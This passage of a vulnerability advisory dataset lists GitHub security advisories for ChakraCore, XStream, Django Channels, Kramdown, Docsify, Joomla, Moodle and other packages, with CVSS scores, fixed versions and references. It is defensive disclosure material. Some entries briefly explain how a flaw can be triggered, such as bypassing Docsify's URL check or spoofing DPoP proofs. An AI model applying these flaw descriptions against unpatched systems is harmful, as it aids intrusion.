'https://github.com/chakra-core/ChakraCore/commit/cc871514deeaeaedb5b757c2ca8cd4ab9abccb5d'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1335'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:25:28Z', 'nvd_published_at': '2019-10-10T14:15:00Z'}"
+1.4.0,GHSA-2wwc-w2gw-4329,2021-03-23T15:27:12Z,2021-03-29T20:55:36Z,,['CVE-2019-1366'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1307, CVE-2019-1308, CVE-2019-1335.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1366'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/94181502091b7c22eb86ab1b45ce80bf7ff03aaf'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/cc871514deeaeaedb5b757c2ca8cd4ab9abccb5d'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1366'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T15:27:12Z', 'nvd_published_at': '2019-10-10T14:15:00Z'}"
+1.4.0,GHSA-v542-8q9x-cffc,2023-09-05T14:34:15Z,2021-03-19T21:29:02Z,,['CVE-2020-35681'],Django Channels leakage of session identifiers using legacy AsgiHandler,"Django Channels 3.x before 3.0.3 allows remote attackers to obtain sensitive information from a different request scope. The legacy channels.http.AsgiHandler class, used for handling HTTP type requests in an ASGI environment prior to Django 3.0, did not correctly separate request scopes in Channels 3.0. In many cases this would result in a crash but, with correct timing, responses could be sent to the wrong client, resulting in potential leakage of session identifiers and other sensitive data. Note that this affects only the legacy Channels provided class, and not Django's similar ASGIHandler, available from Django 3.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'channels'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35681'}, {'type': 'WEB', 'url': 'https://github.com/django/channels/commit/e85874d9630474986a6937430eac52db79a2a022'}, {'type': 'WEB', 'url': 'https://channels.readthedocs.io/en/stable/releases/3.0.3.html'}, {'type': 'WEB', 'url': 'https://channels.readthedocs.io/en/stable/releases/index.html'}, {'type': 'WEB', 'url': 'https://github.com/django/channels/releases'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-13T00:47:11Z', 'nvd_published_at': '2021-02-22T03:15:00Z'}"
+1.4.0,GHSA-4hrm-m67v-5cxr,2022-02-08T21:32:36Z,2021-03-22T23:28:49Z,,['CVE-2021-21346'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact
+The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+
+### Patches
+If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16.
+
+### Workarounds
+See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
+
+### References
+See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21346](https://x-stream.github.io/CVE-2021-21346.html).
+
+### Credits
+wh1t3p1g G5-RD6@IIE found and reported the issue to XStream and provided the required information to reproduce it.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
+* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-4hrm-m67v-5cxr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21346'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21346.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-434', 'CWE-502'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:24:44Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}"
+1.4.0,GHSA-mg98-x2cm-4cpf,2021-03-18T22:36:54Z,2021-03-29T20:59:15Z,,['CVE-2019-1106'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1062, CVE-2019-1092, CVE-2019-1103, CVE-2019-1107.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1106'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/362e96537af207be3ecf7fa32f338229ee1dcc46'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/75162b7f2d8ac2b37d17564e9c979ba1bae707e8'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1106'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:36:54Z', 'nvd_published_at': '2019-07-15T19:15:00Z'}"
+1.4.0,GHSA-p44j-xrqg-4xrr,2021-03-08T21:06:09Z,2021-03-08T21:06:23Z,,['CVE-2021-21337'],URL Redirection to Untrusted Site ('Open Redirect') in Products.PluggableAuthService,"### Impact
+_What kind of vulnerability is it? Who is impacted?_
+
+Open redirect vulnerability - a maliciously crafted link to the login form and login functionality could redirect the browser to a different website.
+
+### Patches
+_Has the problem been patched? What versions should users upgrade to?_
+
+The problem has been fixed in version 2.6.1. Depending on how you have installed Products.PluggableAuthService, you should change the buildout version pin to `2.6.1` and re-run the buildout, or if you used `pip` simply do `pip install ""Products.PluggableAuthService>=2.6.1""`
+
+### Workarounds
+_Is there a way for users to fix or remediate the vulnerability without upgrading?_
+
+There is no workaround. Users are encouraged to upgrade.
+
+### References
+_Are there any links users can visit to find out more?_
+
+- [GHSA-p44j-xrqg-4xrr](https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p44j-xrqg-4xrr)
+- [Products.PluggableAuthService on PyPI](https://pypi.org/project/Products.PluggableAuthService/)
+- [OWASP page on open redirects](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in the [Products.PluggableAuthService issue tracker](https://github.com/zopefoundation/Products.PluggableAuthService/issues)
+* Email us at [security@plone.org](mailto:security@plone.org)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'Products.PluggableAuthService'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p44j-xrqg-4xrr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21337'}, {'type': 'WEB', 'url': 'https://github.com/zopefoundation/Products.PluggableAuthService/commit/7eead067898852ebd3e0f143bc51295928528dfa'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Products.PluggableAuthService/'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/162911/Products.PluggableAuthService-2.6.0-Open-Redirect.html'}]","{'cwe_ids': ['CWE-601'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-08T21:06:09Z', 'nvd_published_at': '2021-03-08T21:15:00Z'}"
+1.4.0,GHSA-52p9-v744-mwjj,2021-03-31T20:25:55Z,2021-03-29T16:30:34Z,,['CVE-2021-28834'],Remote code execution in Kramdown,"Kramdown before 2.3.1 does not restrict Rouge formatters to the Rouge::Formatters namespace, and thus arbitrary classes can be instantiated.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'kramdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.16.0'}, {'fixed': '2.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28834'}, {'type': 'WEB', 'url': 'https://github.com/gettalong/kramdown/pull/708'}, {'type': 'WEB', 'url': 'https://github.com/stanhu/kramdown/commit/d6a1cbcb2caa2f8a70927f176070d126b2422760'}, {'type': 'WEB', 'url': 'https://github.com/stanhu/kramdown/commit/ff0218aefcf00cd5a389e17e075d36cd46d011e2'}, {'type': 'WEB', 'url': 'https://about.gitlab.com/releases/2021/03/17/security-release-gitlab-13-9-4-released/#remote-code-execution-via-unsafe-user-controlled-markdown-rendering-options'}, {'type': 'WEB', 'url': 'https://github.com/gettalong/kramdown/compare/REL_2_3_0...REL_2_3_1'}, {'type': 'WEB', 'url': 'https://gitlab.com/gitlab-org/gitlab/-/commit/179329b5c3c118924fb242dc449d06b4ed6ccb66'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NJCJVYHPY6LNUFM6LYZIAUIYOMVT5QGV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S3BBLUIDCUUR3NEE4NJLOCCAV3ALQ3O6/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SYOLQKFL6IJCQLBXV34Z4TI4O54GESPR/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4890'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T20:16:56Z', 'nvd_published_at': '2021-03-19T07:15:00Z'}"
+1.4.0,GHSA-2rfj-2mwp-787v,2021-03-22T22:38:37Z,2021-03-29T20:57:51Z,,['CVE-2019-0993'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0989, CVE-2019-0991, CVE-2019-0992, CVE-2019-1002, CVE-2019-1003, CVE-2019-1024, CVE-2019-1051, CVE-2019-1052.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0993'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/36644ee0d4cc2bc97a3cd49c3540e6eea193182a'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/3d6226cc2d1077537220361c82e34a362c6c76ee'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0993'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:38:37Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}"
+1.4.0,GHSA-vgwr-773q-7j3c,2021-03-24T17:57:48Z,2021-03-24T17:58:13Z,,['CVE-2021-26028'],Path Traversal within joomla/archive zip class,An issue was discovered in Joomla! 3.0.0 through 3.9.24. Extracting an specifilcy crafted zip package could write files outside of the intended path.,[],"[{'package': {'ecosystem': 'Packagist', 'name': 'joomla/archive'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26028'}, {'type': 'WEB', 'url': 'https://github.com/joomla-framework/archive/commit/32c9009a1020d16bc1060c0d06339898b697cf2c'}, {'type': 'WEB', 'url': 'https://developer.joomla.org/security-centre/848-20210308-core-path-traversal-within-joomla-archive-zip-class.html'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/joomla/archive/CVE-2021-26028.yaml'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T17:57:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-2h3h-vw8r-82rp,2021-07-22T15:58:18Z,2021-03-26T16:49:26Z,,['CVE-2021-27884'],Weak JSON Web Token in yapi-vendor,Weak JSON Web Token (JWT) signing secret generation in YMFE YApi through 1.9.2 allows recreation of other users' JWT tokens. This occurs because Math.random in Node.js is used as a source of randomness in jwt signing. Math.random does not provide cryptographically secure random numbers. This has been patched in version 1.9.3.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'yapi-vendor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.9.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27884'}, {'type': 'WEB', 'url': 'https://github.com/YMFE/yapi/issues/2117'}, {'type': 'WEB', 'url': 'https://github.com/YMFE/yapi/issues/2263'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2020-228-YMFE-yapi'}]","{'cwe_ids': ['CWE-330'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-26T16:48:44Z', 'nvd_published_at': '2021-03-01T23:15:00Z'}"
+1.4.0,GHSA-h77r-rp97-7rv4,2021-10-20T17:37:39Z,2021-03-29T20:43:01Z,,['CVE-2020-25699'],Privilage Escalation in moodle,"In moodle, insufficient capability checks could lead to users with the ability to course restore adding additional capabilities to roles within that course. Versions affected: 3.9 to 3.9.2, 3.8 to 3.8.5, 3.7 to 3.7.8, 3.5 to 3.5.14 and earlier unsupported versions. This is fixed in moodle 3.9.3, 3.8.6, 3.7.9, 3.5.15, and 3.10.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.9.0'}, {'fixed': '3.9.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0'}, {'fixed': '3.8.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.7.0'}, {'fixed': '3.7.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5'}, {'fixed': '3.5.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25699'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/b8e1eec4c77c858de87fedf4e405e929539ea0c5'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1895425'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4NNFCHPPHRJNJROIX6SYMHOC6HMKP3GU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B55KXBVAT45MDASJ3EK6VIGQOYGJ4NH6/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=413936'}]","{'cwe_ids': ['CWE-269', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T23:15:54Z', 'nvd_published_at': '2020-11-19T17:15:00Z'}"
+1.4.0,GHSA-758c-g2ff-9444,2021-03-22T22:37:00Z,2021-03-29T20:57:49Z,,['CVE-2019-1140'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1131, CVE-2019-1139, CVE-2019-1141, CVE-2019-1195, CVE-2019-1196, CVE-2019-1197.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1140'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1140'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:37:00Z', 'nvd_published_at': '2019-08-14T21:15:00Z'}"
+1.4.0,GHSA-prxj-c66c-4gcf,2021-03-18T22:02:15Z,2021-03-29T21:00:12Z,,['CVE-2019-0924'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0924'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/6615113a09c0618ecc10e5680ffb978bf665641f'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0924'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:02:15Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
+1.4.0,GHSA-2mm9-c2fx-c7m4,2023-09-13T20:21:27Z,2021-03-01T19:44:27Z,,['CVE-2021-23342'],Docsify XSS Vulnerability,"This affects the package docsify before 4.12.0. It is possible to bypass the remediation done by CVE-2020-7680 and execute malicious JavaScript through the following methods 1) When parsing HTML from remote URLs, the HTML code on the main page is sanitized, but this sanitization is not taking place in the sidebar. 2) The isURL external check can be bypassed by inserting more `////` characters","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'docsify'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.12.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23342'}, {'type': 'WEB', 'url': 'https://github.com/docsifyjs/docsify/commit/ff2a66f12752471277fe81a64ad6c4b2c08111fe'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1076593'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOCSIFY-1066017'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/docsify'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/161495/docsify-4.11.6-Cross-Site-Scripting.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2021/Feb/71'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-24T07:31:57Z', 'nvd_published_at': '2021-02-19T17:15:00Z'}"
+1.4.0,GHSA-c4qr-gmr9-v23w,2021-03-02T03:32:25Z,2021-03-03T02:18:08Z,,['CVE-2021-21322'],Prefix escape,"### Impact
+
+By crafting a specific URL, it is possible to escape the prefix of the proxied backend service.
+If the base url of the proxied server is `/pub/`, a user expect that accessing `/priv` on the target service would not be possible. Unfortunately, it is.
+
+[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N)
+
+### Patches
+
+All releases after v4.3.1 include the fix.
+
+### Workarounds
+
+There are no workaround available.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [fastify-reply-from](https://github.com/fastify/fastify-reply-from)
+* Email us at [hello@matteocollina.com](mailto:hello@matteocollina.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'fastify-http-proxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fastify/fastify-http-proxy/security/advisories/GHSA-c4qr-gmr9-v23w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21322'}, {'type': 'WEB', 'url': 'https://github.com/fastify/fastify-http-proxy/commit/02d9b43c770aa16bc44470edecfaeb7c17985016'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/fastify-http-proxy'}]","{'cwe_ids': ['CWE-20'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-02T03:32:25Z', 'nvd_published_at': '2021-03-02T04:15:00Z'}"
+1.4.0,GHSA-xmh9-rg6f-j3mr,2021-03-10T04:01:48Z,2021-03-12T22:39:01Z,,[],Verification flaw in Solid identity-token-verifier,"### Impact
+#### Severity
+Any Pod on a Solid server using a vulnerable version of the identity-token-verifier library is at risk of a spoofed Demonstration of Proof-of-Possession (DPoP) token binding. This vulnerability could give total and complete access to a targeted Pod.
+
+#### Summary
+A verification flaw in the implementation of the identity token verifier library (https://github.com/solid/identity-token-verifier) allows DPoP proofs to be spoofed.
+
+DPoP proofs are used to bind access tokens to a private key meant to be in sole possession of a specific user. Instead of verifying against the hash of an embedded public key, the library instead verifies against a field that an attacker can modify to spoof another user’s DPoP.
+
+A stolen DPoP proof, when used in the right context, therefore allows the rebinding of a DPoP-bound access token. Any attacker in possession of a targeted access token could build an attack environment to replay it on any Pod service with this vulnerability.
+
+
+### Patches
+A new version 0.5.2 of identity-token-verifier fixes the verification: https://github.com/solid/identity-token-verifier/blob/7e18d86d65ee681e8ae912b6a032a1bae3cae570/src/lib/DPoP.ts#L25-L35
+
+### Workarounds
+None
+
+### References
+_Are there any links users can visit to find out more?_
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in the [identity-token-verifier](https://github.com/solid/identity-token-verifier/) repository.
+* Email: info@solidproject.org",[],"[{'package': {'ecosystem': 'npm', 'name': '@solid/identity-token-verifier'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/solid/identity-token-verifier/security/advisories/GHSA-xmh9-rg6f-j3mr'}, {'type': 'WEB', 'url': 'https://github.com/solid/identity-token-verifier/commit/fbdeb4aa8c12694b3744cd0454acb826817d9e6c'}, {'type': 'WEB', 'url': 'https://github.com/solid/identity-token-verifier/releases/tag/0.5.2'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@solid/identity-token-verifier'}]","{'cwe_ids': ['CWE-290'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-10T04:01:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h6wf-hvwc-fm77,2021-03-18T21:28:46Z,2021-03-29T21:00:02Z,,['CVE-2019-0914'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0914'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d85b5025b047f10784c53c6c1dd771775d417f5f'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0914'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:28:46Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
